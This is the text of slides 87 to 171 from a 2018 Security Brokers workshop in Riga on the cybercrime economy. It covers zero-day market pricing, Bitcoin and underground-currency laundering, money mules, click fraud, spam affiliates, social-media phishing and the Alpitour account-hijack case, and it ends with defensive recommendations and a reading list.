  87. 87. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers NFC, the next nightmare 
  88. 88. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers NFC, the next nightmare 
  89. 89. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers NFC, the next nightmare 
  90. 90. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Who’s who
  91. 91. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers …From RBN up to now… things evolved 
  92. 92. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Videoclip time!
  93. 93. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers 0days market
  94. 94. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers The pricing debate Source: Forbes, “Shopping For Zero-Days: A Price List For Hackers’ Secret Software Exploits”, 2012, in http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret- software-exploits I think all of you remember this:
  95. 95. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers The pricing debate What about this? (CHEAP but LAME, India’s ones)
  96. 96. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Where’s the truth? What’s the right approach with «pricing»?
  97. 97. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers 0-days scenarios Who would buy/trade/whatever this stuff from someone who found a vuln -> exploit -> 0day? Some hacker folks.  (which, eventually, may resell it to one of the following): IT Vendors Security Vendors Big Internet players 0days «brokers» LI private companies Law Enforcement Agencies (LEAs) Intelligence Agencies (IAs) Cybercrime / Organized Crime (drugs cartels in Mexico, ever heard about?) Pwoning contests, CTFs, etc. (Hacktivists?)
  98. 98. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers → 0-day Markets 0-day Software «Bug» Vendors CERT (ICS-CERT) National Institutions Patch Software Rel x.y.z Black Market (Cybercrime)Black Market (underground) White (?) Market Getting the big picture
  99. 99. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers A different (more serious?) approach Public Knowledge of the vulnerability Buyer’s typology IS = IT Security companies INT = Intelligence Agencies for Governmental use (National Security protection) MIL = MoD/related actors for warfare use OC = Cybercrime 0-day Exploit code + PoC Cost: Min/Max Y IS 10K – 50K USD Y INT 30K – 150K USD Y MIL 50K – 200K USD Y OC 5K – 80K USD N ALL X2 – X10
  100. 100. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers A different (more serious?) approach Public Knowledge of the vulnerability Vulnerability relays on: Operating System ( OS) Major General Applications (MGA) SCADA-Industrial Automation (SCADA) Buyer’s typology IS = IT Security companies INT = Intelligence Agencies for Governmental use (National Security protection) MIL = MoD/related actors for warfare use OC = Cybercrime 0-day Exploit code + PoC Cost: Min/Max Y OS OC 40K – 100K Y MGA INT 100K – 300K Y SCADA MIL 100K – 300K N OS MIL 300K – 600K N SCADA MIL 400K – 1M
  101. 101. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Not a «very well known» world
  102. 102. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers
  103. 103. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Finfisher
  104. 104. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Global, dirty business  “Mass interception of entire populations is not only a reality, it is a secret new industry spanning 25 countries.”  “It's estimated that the global computer surveillance technology market is worth $5 billion a year.”
  105. 105. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Who do you wanna sell (your 0days) to?
  106. 106. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers On Bitcoins
  107. 107. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bitcoins  A peer-to-peer digital currency that is pseudo-anonymous.  The identity of the individual is disguised, but his/her transactions are open to the public.  It is anonymous to the extent that it is difficult to relate a digital identity to an actual person.  Bitcoins have huge implications on money laundering.  Various government institutions around the world are starting to view it as an area requiring regulation.
  108. 108. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bitcoins  Bitcoins are created through a process of ‘mining’, in which users who provide their computing power, verify and record payments into a public ledger in exchange for transaction fees in newly minted bitcoins.  This process is akin to a central bank printing new money, but is less centralised.
  109. 109. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers On Bitcoins: why is it important to business?  Botnets steal your computing power to either: 1) ‘Mine’ more bitcoins. Similar to SETI, but more nefarious. 2) Conduct various cyber crimes  If your networks are insecure, you are indirectly facilitating cyber criminals.
  110. 110. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bitcoins
  111. 111. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bitcoins
  112. 112. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bitcoins
  113. 113. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Round-tripping with Bitcoins The full presentation of this project is available in the Annexes (WEF – Bitcoins Tracking Project) Illegal Money Aquired through clic fraud, carding…etc Exchanger Verified exchanger or peers E.g. Mt Gox, Coinbase, Bitstamp or anyone else willing Bitcoin Account Bitcoin “Smurfed” Account Cash out Money transferred or taken out from Exchanger
  114. 114. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Round-tripping con Bitcoins The full presentation of this project is available in the Annexes (WEF – Bitcoins Tracking Project)
  115. 115. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Summarizing on Bitcoins  While Bitcoins can be used legitimately, they are used by cyber criminals to launder money.  An unsecured network can be used by the same cyber criminals, thereby indirectly increasing their gains.  More regulation is required in the area.  We would like to use international credit card fraud data to further examine to extent to which Bitcoins are related to fraud.  The data has been difficult to obtain so far.
  116. 116. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers How do you pay for cybercrime services/products?  CASH (F2F)  Offshore bank accounts  Underground currencies (digital)  NOTE: it’s not just about Bitcoins!
  117. 117. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers HAWALA
  118. 118. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Learning from terrorism financial models
  119. 119. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Underground currencies
  120. 120. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  121. 121. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  122. 122. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  123. 123. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  124. 124. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  125. 125. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  126. 126. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  127. 127. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  128. 128. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  129. 129. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers “Underground” currencies
  130. 130. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bad guys hacking bad guys
  131. 131. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cashing out
  132. 132. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Investigative opportunities
  133. 133. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers «Follow the money» Judge Giovanni Falcone, killed by Italian mafia with a bomb on the highway in Sicily on May 23rd, 1992.
  134. 134. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers «Follow the money!»
  135. 135. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Credit Cards & goods
  136. 136. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Main approaches to cash-out
  137. 137. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Insights
  138. 138. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Click-Fraud campaigns ClickForensics stats tell us that back in 2008, the Cybercrime gained 33$ Millions from Click Fraud campaigns.
  139. 139. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers «Traffic» re/sellers Traffic from web sites/users in US, UK, AU, CA and DE. 1000 visits at 7$ Minimum buy: 5.000 visits. In this case «Traffic» is sold, meaning the quantity of HTTP requests of unaware users on regular but compromised (hacked) web sites. Those requests are redirected to malicious domains (owned by the buyer of the service), which usually host «Exploit Kits». Very often they produce sold traffic via MSN, FB and Linkedin spam as well.
  140. 140. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers «Traffic» re/sellers
  141. 141. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Spam campaigns Among the higher revenue business models for a Botnet master, there is Spam. Here we can see a organization named «EvaPharmacy» which offers «affiliations for Botnets». In exchange for a spam campaign, they offer 45% on every sold product between 60$ and 100$ which is coming from their own campaign. 85% of global Spam’s source is estimated as Botnets.
  142. 142. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Global Business
  143. 143. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Money Mules: «very normal people?»
  144. 144. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Complex management Phisher
  145. 145. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers OSINT and investigations “Open sources can provide up to 90% of the information needed to meet most U.S. intelligence needs” -- Deputy Director of National Intelligence, Thomas Fingar
  146. 146. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers OSINT and investigations
  147. 147. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers OSINT, social and mules
  148. 148. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Sometimes, easy to catch… Criminal Persona Real Persona Money Mule Yulia Klepikova
  149. 149. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Sometimes, easy to catch…
  150. 150. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Going «social»
  151. 151. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Social media “Social Media are a set of Web 2.0 platforms, thanks to which users interact directly, producing and sharing contents from their own and/or editing other ones, in real time”. (wikipedia)  This is certainly true, but….  Why are they (mostly) free?  Who owns them (really?)  Who controls them (really?)  What do they do with everybody’s social graphs and behaviours?  And with all of that information?  What about all of those pictures?  What’s written inside their EULAs?  Are they filtered?  Are they neutral?  Are they secure?
  152. 152. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Social Networks as weapons?
  153. 153. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers
  154. 154. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers SN = Cybercrime heaven (and IAs!)
  155. 155. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Social as (possible) business risk
  156. 156. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Social and the risks for the users (unawared, newbies…)
  157. 157. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Phishing via FB
  158. 158. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Spear phishing («sender»: Facebook)
  159. 159. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Spear phishing on professional SN (Linkedin)
  160. 160. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Twitter and PsyOps
  161. 161. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Associated Press, Twitter and NYSE The hijacking ot AP twitter account causes a loss of 53B$ at the NYSE…. Who gained from this??
  162. 162. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers The «Alpitour» case study
  163. 163. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers  Gang # 1 (North Africa) hacks on September 11, 2013, the Facebook profile of the Travel Company Group (Viaggidea, Francorosso, Villaggi Bravo, Alpitour) gaining full control (Spear Phishing attack). o They start posting fake offers (look at those irresistible beach images and those special prices you can’t miss!); the links drove the users to a new variant of Zeus malware o Average of 120.000 users exposed to serious risks o Over the next 48 hours, many messages were posted on different social profiles of the Group; later the Group canceled those messages from FB, while they had been visible for weeks from the Alpitour Twitter, since they configured at auto-post feature).  Gang # 2 (Gulf area) 13-14 September, 2013 o Those posts from these dates look much different (grammar, contents). o Probably Gang #1 sold the access to Gang #2. Posts show a very bad Italian language and grammar. Later, the attacker(s) published someposts in Arabic , and committed grammar mistakes when writing in English (i.e. "bages" rather than pages). o In this second abuse case, the gang used the infected accounts in order to send «trusted» malicious links, thus gaining the full control of the target devices in order to send massive spam. The «Alpitour» case study: MO and goals
  164. 164. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers
  165. 165. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Web reputation, indexing, media/press, posts, social…
  166. 166. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers One year later
  167. 167. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Wrap up: solutions Full review of your own approaches and models (new threats, new scenarios)  Risk Management “2.0” and Crisis Management policies (cyber): PR, Legal, Security, Board  Social Networks  Web Applications (OWASP, S-SDLC, Secure Coding!!!)  Apps (especially if from the banking industry)  In-security on e-banking customer’s client-side (OS, routers, Phishing)  Anti-DDoS procedures  Security Testing (stop “low budget” = low quality!)  Use of methodologies! (OSSTMM + RAVs)  Talk each others (IT, Security, PR and Marketing: all together…)  “Cyber” crisis simulations  Procedures and Dedicated Teams on Digital Forensics (ahead of a incident, not later!!)  Cybercrime Intelligence  IPv6
  168. 168. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Acknowledgements (Bitcoin research and Underground currencies) Dr George Li, BSc (Syd), BCom (Syd, Hons. I), PhD (Syd) Antonio Guerrero, PG Dip Management, MGSM, MBA (2014), MGSM Fyodor Yarochkin (the “Xprobe2” guy”)
  169. 169. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers ●The commercialization of Digital Spying, Morgan Marquis-Boire, Claudio Guarnieri, Bill Marczak, John Scott-Railton, Citizen Lab, Canada Center for Global Security Studies, Munk School of Global Affairs (University of Toronto), 2013 ●No Place to Hide: Edward Snowden, the NSA and Surveillance State, Glenn Greenwald, Penguin Books, 2014 ●Kingpin, Kevin Poulsen, Hoepli Editore, 2012 ●Profiling Hackers: the Science of Criminal Profiling as applied to the world of hacking, Raoul Chiesa, Stefania Ducci, Silvio Ciappi, CRC Press/Taylor & Francis Group, 2009 ●H.P.P. Questionnaires 2005-2010 ● Fatal System Error: the Hunt for the new Crime Lords who are bringing down the Internet, Joseph Menn, Public Affairs, 2010 ● Stealing the Network: How to 0wn a Continent, (an Identity), (a Shadow) (V.A.), Syngress Publishing, 2004, 2006, 2007 ● Stealing the Network: How to 0wn the Box, (V.A.), Syngress Publishing, 2003 ● Underground: Tales of Hacking, Madness and Obsession on the Electronic Frontier, Suelette Dreyfus, Random House Australia, 1997 ● The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage, Clifford Stoll, DoubleDay (1989), Pocket (2000) ● Masters of Deception: the Gang that Ruled Cyberspace, Michelle Stalalla & Joshua Quinttner, Harpercollins, 1995 ● Kevin Poulsen, Serial Hacker, Jonathan Littman, Little & Brown, 1997 ● Takedown, John Markoff and Tsutomu Shimomura, Sperling & Kupfler, (Hyperion Books), 1996 ● The Fugitive Game: online with Kevin Mitnick, Jonathan Littman, Little & Brown, 1997 ● The Art of Deception, Kevin D. Mitnick & William L. Simon, Wiley, 2002 ● The Art of Intrusion, Kevin D. Mitnick & William L. Simon, Wiley, 2004 ● @ Large: the Strange Case of the World’s Biggest Internet Invasion, Charles Mann & David Freedman, Touchstone, 1998 Reading Room /1
  170. 170. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers ●The Estonia attack: Battling Botnets and online Mobs, Gadi Evron, 2008 (white paper) ●Who is “n3td3v”?, by Hacker Factor Solutions, 2006 (white paper) ●Mafiaboy: How I cracked the Internet and Why it’s still broken, Michael Calce with Craig Silverman, 2008 ●The Hacker Diaries: Confessions of Teenage Hackers, Dan Verton, McGraw-Hill Osborne Media, 2002 ●Cyberpunk: Outlaws and Hackers on the Computer Frontier, Katie Hafner, Simon & Schuster, 1995 ●Cyber Adversary Characterization: auditing the hacker mind, Tom Parker, Syngress, 2004 ●Inside the SPAM Cartel: trade secrets from the Dark Side, by Spammer X, Syngress, 2004 ●Hacker Cracker, Ejovu Nuwere with David Chanoff, Harper Collins, 2002 ●Compendio di criminologia, Ponti G., Raffaello Cortina, 1991 ● Criminalità da computer, Tiedemann K., in Trattato di criminologia, medicina criminologica e psichiatria forense, vol.X, Il cambiamento delle forme di criminalità e devianza, Ferracuti F. (a cura di), Giuffrè, 1988 ● United Nations Manual on the Prevention and Control of Computer-related Crime, in International Review of Criminal Policy – Nos. 43 and 44 ● Criminal Profiling: dall’analisi della scena del delitto al profilo psicologico del criminale, Massimo Picozzi, Angelo Zappalà, McGraw Hill, 2001 ● Deductive Criminal Profiling: Comparing Applied Methodologies Between Inductive and Deductive Criminal Profiling Techniques, Turvey B., Knowledge Solutions Library, January, 1998 ●Malicious Hackers: a framework for Analysis and Case Study, Laura J. Kleen, Captain, USAF, US Air Force Institute of Technology ● Criminal Profiling Research Site. Scientific Offender Profiling Resource in Switzerland. Criminology, Law, Psychology, Täterpro Reading Room /2
  171. 171. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Contacts, Q&A Need anything, got doubts, wanna ask us smth? rc [at] security-brokers [dot] com sg [at] security-brokers [dot] com Thanks for your attention! QUESTIONS?

×